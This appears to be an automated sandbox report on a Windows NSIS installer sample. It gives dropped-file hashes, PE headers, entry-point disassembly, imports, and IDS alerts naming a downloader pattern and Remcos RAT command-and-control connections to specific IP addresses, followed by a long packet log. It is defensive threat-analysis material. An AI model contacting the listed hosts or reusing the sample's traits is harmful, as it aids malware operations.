                                                SHA-256:15014E3AD8B7297A15E47E245A02E099F0E964E64E5D64079D5E95599B9E09FB
                                                SHA-512:D9D5F00FBE4BAC6F7211C6E9BCB890974D30C58C63C0284291F41AC1842FC0D4CFA69BD7987F965008142A986B858A7336A68D966F54ABCE9B2C1AD39F9D0B53
                                                Malicious:false
                                                Preview:..~~............................H.....cc............................>>...4......GG.......PPPPP.K...k........s...?.......zzz...AA..............b...^^^^.....................AA........!!....z.......................................V./............33...............E........aa.KK........L.KK......u.........M...................................W........%%......HHHH........................-.......................s.................p....O..........000..N...`.::::......*...............AA.....................///....---.............c.........J......l................dd........d...........5................E...........................((.....p....^.......QQ...YYY.t..............PP..222222..........[................>>....jj.((((.kkk...........[.._.......V.i...........LLLLL..../............|..C.........................99.\\.......................aa.....................www....[...rr........I..u..9....H....II......:...........+.............{{.p....8.................T...............A....T...........v.........
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):384
                                                Entropy (8bit):4.181922364695503
                                                Encrypted:false
                                                SSDEEP:6:hLSQ1t70vwRiopg/iZJoLBduF00X3KA4pcW+vmQQWLUbUHrMrCK+I6MDGIU79evD:hN04RicZiLBdA4pPWLZorgZMDGIU7Mr
                                                MD5:78D840110C9709A6F508016469DB3D70
                                                SHA1:C3D13AB39B7FCEACAB772CE6E0326534C785B556
                                                SHA-256:C5B25CB253F46AA344C6543D87B93B973337D71CFE28D82F1A138E35A957F81C
                                                SHA-512:C4E0526A4000EE4D477DC9E95F43CD2940C7B81E452FDEE70D08E92F3DC60356F41FD4D88FB09C8B8A5819EA930FFC339E9C18D9D3D8DCEEDE8631C5FAEA5F0D
                                                Malicious:false
                                                Preview:samfundsordnens sonorescence nonenvironmentally acropolitan,brunissure gala valdrappene barton stridsksers egebark zorrillo..brodernationens grandtotal documentises kortkunden aneared ceruse andry..dejens omrringens eksorcist anacrotic drmmeslottet modulationsfrekvens,agerbrugernes frstegangspatient beboersammenstning afrakningernes tyvetsenes,whindle dokumentation monsignor melbr,
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2527384
                                                Entropy (8bit):0.15771732412061856
                                                Encrypted:false
                                                SSDEEP:768:cV2EqQl1cX7MZhmJTywdQ2Z2QYnLs0H1h8OczA++COcK0GYcj9Zy3/I0kfcwlbfK:Ve
                                                MD5:1605B3CE3BC79189F8694FF97A10C5E4
                                                SHA1:B82ED5C328BDA0E88E57F3DD8075C989ECC93317
                                                SHA-256:85BCF4761B920061E9D3451C6CAEEEFD8B9199D6B47085F461715188D9234987
                                                SHA-512:FF81B66027C077BE28D0C52D790DD230A66C0E61BA89867880C7A99294D97B60AF5822AD5FE3C6D83CB01F68D5470952C2CAC99695865FE7A34D69D2A1E08431
                                                Malicious:false
                                                Preview:...................................................................................................................................................................................................................................................................................................................................v....................g.....................................................7....................................................................................................................................................................................................................................................................................................................................................................................................................................................,....................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):10633816
                                                Entropy (8bit):0.15833238703625532
                                                Encrypted:false
                                                SSDEEP:768:JiH6Tc7n5/aJJ9qWS2gAuGn6ZiMCwfjh+V2yQX9daDQjdbAFrmE1vsevL9Ub1aqJ:01l16flG
                                                MD5:1F0E8B8C829457FF8BC9A6D066A67949
                                                SHA1:7B91EF7C02E35D120729EB4E5D37CF9E72DEE466
                                                SHA-256:AE3CD420FC97538E335B7199244A8338636F647F6DB92C84B972A6817B7BE247
                                                SHA-512:1949D2312709F465CD734AAD3FA0530C23E86C88C42A55820E4B47B61C25FAE35F94628AE174451819B74FDFBF540AF0E07D1CB69997925ADFF92A30E4854F44
                                                Malicious:false
                                                Preview:.....................................................................G..............................................................................................#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................O..................................................................................................................................................................................q...........................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6456826
                                                Entropy (8bit):0.15828912434236683
                                                Encrypted:false
                                                SSDEEP:768:eCPhDopkmPa4U2P3Uwkg5VvCU7YgRh8T8JhJC4ULpMPY8SsogMlg78dlGPg0vN1b:VW7uE89Eu
                                                MD5:1D76BAD74066C8632B985BFEF7403BA7
                                                SHA1:3B61768A449C3D1BAE0E82DE599ADF5130917D54
                                                SHA-256:747794579030D9280702A056DF2546FEC218D1259F268075243C1204723A91D1
                                                SHA-512:158138DD678D437482484F1835ADFCD4349A1DDD3E7CF508A5DBACA358771069060793EF8FD5FF661D641C4EA520868B013B5B65B920A766963EED7A38C448D4
                                                Malicious:false
                                                Preview:.................................................................................................................................................................................................................................................................................S..............................................................................................................................................................................................................................................................................................................................................................}.......................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1271421
                                                Entropy (8bit):0.15816996989165297
                                                Encrypted:false
                                                SSDEEP:768:W7rtu0KSmXSs3fA+rQ/4FkDCXMdHdyq5hDJAkKBYnDAc:t
                                                MD5:0507D743AD7E1ABA22BC2024E4813353
                                                SHA1:D89D4377D380A52492610C059AD09241A320B89B
                                                SHA-256:FF629154C61F5DBC70FFA5604F7D4F0DE88A982E0E034EAA72339B5B52A92404
                                                SHA-512:6A8C4CA920FA6D921C4D7D15A6F3A4DB19526FEC88BC1EEEE24BA0168855280A89333A49607B66009E5E95B9F099FE86752582A5F41874309110248FA4DE4D7A
                                                Malicious:false
                                                Preview:......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................7...k.............................................................................|................................................................................................................................................................d...........................................................................................<..................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6804430
                                                Entropy (8bit):0.15943662261477257
                                                Encrypted:false
                                                SSDEEP:768:MQ/VuBzIpI4PtRMbHS+BnchAixbya9vkqNsWlP096/9WFRN8PR1nw2nVXsaNRW44:JSGMfX
                                                MD5:7C28FF654A13329CE1E20646DD23F864
                                                SHA1:2A65BC0FC67CBEA9F59F7E315C9591711E81F235
                                                SHA-256:9B9E25D40762E80084ED7F33A487F4948483914C91EAF903D5D82A862753A423
                                                SHA-512:23E49F5FAACCB14895FD48A255C9632D73307492A2585B1A6881CF03ACD3D9B5E60C1351CE10CA581CDDB5C0D78D4EFF951A0275B7526850E5FB4B0442A5461A
                                                Malicious:false
                                                Preview:............................................................................................................................................................................................................................................................................h................................................................"........................................................................................................................................................a..............................................................................................................................h..............................................................................................................................................~........................................N...........................................................1.........................m....................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2599548
                                                Entropy (8bit):0.15790946923512963
                                                Encrypted:false
                                                SSDEEP:768:J+LajrrMq9eQMzGaUk1/wd+BpREEsAWZMOo6Q991C5XhBtblZXTPA1YcF98h2218:gjW
                                                MD5:7F2BF13C70E094999CA92A423DCCDB92
                                                SHA1:463C9E61B745CFF59DBD170780FD43B20FD43456
                                                SHA-256:3A2304AABDE64DDBB367916594F86E9E8016A35119914FB51316BAF272B7A99B
                                                SHA-512:133952552E498A30E7CF0835851B04AF6BDED00205F18A9EEF1304AC3590621DFAD1D58D0F9C884799E8CD4874E710566099EA2047DF89FA76507030AA121839
                                                Malicious:false
                                                Preview:.........................................................................................e.......................n..............................................................................................!..................^.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X............................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):7674503
                                                Entropy (8bit):0.159448269074076
                                                Encrypted:false
                                                SSDEEP:768:EI34KF96i325GRTHsrKRQfgBmcMbX8PQsm5BtEe3/EeIs5ywhG+ZQiA/eWi0xTmM:bGMHku0R
                                                MD5:DDD9C6D20756697A879CEE4C30426407
                                                SHA1:0D2E33372ECCBB05FA6D6DD3A1C62ACA728A192C
                                                SHA-256:9A512C11BC03FE9CD5CC0545BECBE95B7F1D915E4A9937B97AD3A0B994E555AF
                                                SHA-512:2E48D2EFEA18B27492210B36A6F19E4839CB76C5F570DBCAEC13F7C8BC360B4DAD03C309290B167DC9A984F40A113D53E726C8E4267822883B2458649723F1E6
                                                Malicious:false
                                                Preview:...................................................................................................v..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................6.........................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):912531
                                                Entropy (8bit):0.15809016661177164
                                                Encrypted:false
                                                SSDEEP:768:vGMeVeOL+VVl4PXJnMv8Myx7x0c0o3BuvUH6739vYF:9yR
                                                MD5:93B0BFEBA809AF2EF89BAE6C068BF790
                                                SHA1:359D4F82264B813C937668E6D848F68E4A366495
                                                SHA-256:3926FA51200C8AE3F785C31AA4E37E8AE4BB4F6CEFFB4A29B992F4B96C70E169
                                                SHA-512:0FB853954844C20467BC56E66328DE3E1C727037747844BF21D963C467E8FDD338059BEDA350EF31B6E420A3DCB573536722BE74030935EF1E59EA93C053BDC7
                                                Malicious:false
                                                Preview:......................................................................................................................................................m.......................0............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U............................................................l...............................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):43
                                                Entropy (8bit):3.9834949868577314
                                                Encrypted:false
                                                SSDEEP:3:ZRADhx+DLWeaPv:ZRkk6eu
                                                MD5:FF1979A4E488C54C656C860B558916BA
                                                SHA1:62DE8C42E6DBB7DF0A17638DF7E2DD69581B8B5B
                                                SHA-256:81B110E3324CA1280458B649B6D7C08FE3D4D2C1F9406E57A25A29A9E260C936
                                                SHA-512:4F3E0371ADBB1D54ED073C6A3AF64AA1CB6ECDAAEB76ABA333114BC7D714EAEF7FE51C2A4E559907E8B2E816B46B55B8E6B1B680041BE61ADD957B1958454A96
                                                Malicious:false
                                                Preview:[stttefamilier]..gendarmerie=brevvekslede..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.996364301455999
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:IpykYx5iwz.exe
                                                File size:1'727'984 bytes
                                                MD5:15214c528c41de4d5e542ebd3d4ac075
                                                SHA1:bdab48d323ab0e0c4689061db5fb08adfe1afec8
                                                SHA256:5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63
                                                SHA512:02b6635e4f1a98765e65ee14db0e93ab8dfdf4c7c0086addad86e4a09466ae49dc66accda0bc142828656fca994eb99255ea4c762ffc9f6706410e4877cc9fc2
                                                SSDEEP:24576:t9tWunuwwAghUBUQyXGF8X0VMMOFdYHJStLidtLw8tWVq6VdbcGstKR18+YDQZp:NWtP4+P0Vn+dYHMwwjbV6Gst2aDQZp
                                                TLSH:568533A953F00077E390263078BED454EB5D27476F63C79AF7903CB032A26964E09E7A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................b...........3............@
                                                Icon Hash:3d2e0f95332b3399
                                                Entrypoint:0x403384
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x5DF6D4EA [Mon Dec 16 00:50:50 2019 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:7c2c71dfce9a27650634dc8b1ca03bf0
                                                Signature Valid:false
                                                Signature Issuer:CN=cephalothecal, E=Smidiggrelserne@Ekstensive.bl, O=cephalothecal, L=Zadelsdorf, OU="Digestions Iongitter Ruskurser ", S=Th\xfcringen, C=DE
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 21/03/2024 01:44:22 21/03/2025 01:44:22
                                                Subject Chain
                                                • CN=cephalothecal, E=Smidiggrelserne@Ekstensive.bl, O=cephalothecal, L=Zadelsdorf, OU="Digestions Iongitter Ruskurser ", S=Th\xfcringen, C=DE
                                                Version:3
                                                Thumbprint MD5:3D01B8E5D660A86142C31FA45F9D69D6
                                                Thumbprint SHA-1:291309E43A849FEEE4744A692806BAA4ADD52E29
                                                Thumbprint SHA-256:7B87DD29E029233FEB0E733086C7F5F73FE835AABA263F1F53EE64E1CCD16F95
                                                Serial:2A7E1142DFD3BF677921C7FD1D5CDF39C12D8EA2
                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 0040A130h
                                                mov dword ptr [esp+20h], ebx
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [004080A8h]
                                                call dword ptr [004080A4h]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [0042472Ch], eax
                                                je 00007FD82486BD03h
                                                push ebx
                                                call 00007FD82486EE03h
                                                cmp eax, ebx
                                                je 00007FD82486BCF9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00408298h
                                                push esi
                                                call 00007FD82486ED7Fh
                                                push esi
                                                call dword ptr [004080A0h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FD82486BCDDh
                                                push 0000000Ah
                                                call 00007FD82486EDD7h
                                                push 00000008h
                                                call 00007FD82486EDD0h
                                                push 00000006h
                                                mov dword ptr [00424724h], eax
                                                call 00007FD82486EDC4h
                                                cmp eax, ebx
                                                je 00007FD82486BD01h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007FD82486BCF9h
                                                or byte ptr [0042472Fh], 00000040h
                                                push ebp
                                                call dword ptr [00408040h]
                                                push ebx
                                                call dword ptr [00408284h]
                                                mov dword ptr [004247F8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041FCF0h
                                                call dword ptr [00408178h]
                                                push 0040A1ECh
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000xe60.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1a56880x768
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x60e40x62002af1530c9ae9afbf7316987a7849a4dbFalse0.6626275510204082data6.418841418321694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x123e0x1400d28a5cce7e1fff61851e692820673c10False0.4283203125data5.0340602419439024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x1a8380x400e698d830f2431b27ee24c7be8af893baFalse0.64453125data5.218393601728302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x250000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x370000xe600x1000fac1fd0c4d68005346a60e380027ba25False0.401123046875data4.031104968462267IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x372080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                RT_DIALOG0x374f00x120dataEnglishUnited States0.5104166666666666
                                                RT_DIALOG0x376100x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x377300xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x377f80x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x378580x14dataEnglishUnited States1.2
                                                RT_VERSION0x378700x2acdataEnglishUnited States0.49707602339181284
                                                RT_MANIFEST0x37b200x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                DLLImport
                                                KERNEL32.dllSetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetFileAttributesA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-10T20:38:48.834449+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736164.160.91.32443TCP
                                                2025-01-10T20:39:14.698396+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44973794.156.177.1642404TCP
                                                2025-01-10T20:39:37.086202+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44973894.156.177.1642404TCP
                                                2025-01-10T20:39:59.513567+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44982694.156.177.1642404TCP
                                                2025-01-10T20:40:21.908012+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44995594.156.177.1642404TCP
                                                2025-01-10T20:40:44.295391+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45000994.156.177.1642404TCP
                                                2025-01-10T20:41:06.685480+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45001094.156.177.1642404TCP
                                                2025-01-10T20:41:29.092444+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45001194.156.177.1642404TCP
                                                2025-01-10T20:41:51.468057+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45001294.156.177.1642404TCP
                                                2025-01-10T20:42:13.857616+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45001394.156.177.1642404TCP
                                                2025-01-10T20:42:36.234204+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.45001494.156.177.1642404TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 10, 2025 20:38:47.154145002 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:47.154198885 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:47.154306889 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:47.228058100 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:47.228087902 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:48.140913963 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:48.142216921 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:48.505548954 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:48.505583048 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:48.505920887 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:48.505966902 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:48.512171984 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:48.555336952 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:48.834459066 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:48.834522963 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:48.834538937 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:48.834578991 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.061122894 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.061137915 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.061192036 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.061222076 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.061239958 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.061274052 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.061289072 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.063118935 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.063149929 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.063179970 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.063189030 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.063231945 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.299853086 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.299880981 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.299945116 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.299959898 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.299998045 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.301505089 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.301523924 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.301614046 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.301620007 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.301661015 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.303283930 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.303299904 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.303359985 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.303365946 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.303412914 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.304595947 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.304610014 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.304691076 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.304696083 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.304847002 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.526736021 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.526762009 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.526825905 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.526842117 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.526897907 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.528001070 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528017998 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528091908 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528095007 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.528103113 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528146982 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.528161049 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528191090 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528227091 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.528521061 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528537035 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528584003 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.528588057 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.528609991 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.528629065 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.531143904 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.531161070 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.531219959 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.531224966 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.531348944 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.531810999 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.531819105 CET44349736164.160.91.32192.168.2.4
                                                Jan 10, 2025 20:38:49.531883001 CET49736443192.168.2.4164.160.91.32
                                                Jan 10, 2025 20:38:49.531888008 CET44349736164.160.91.32192.168.2.4
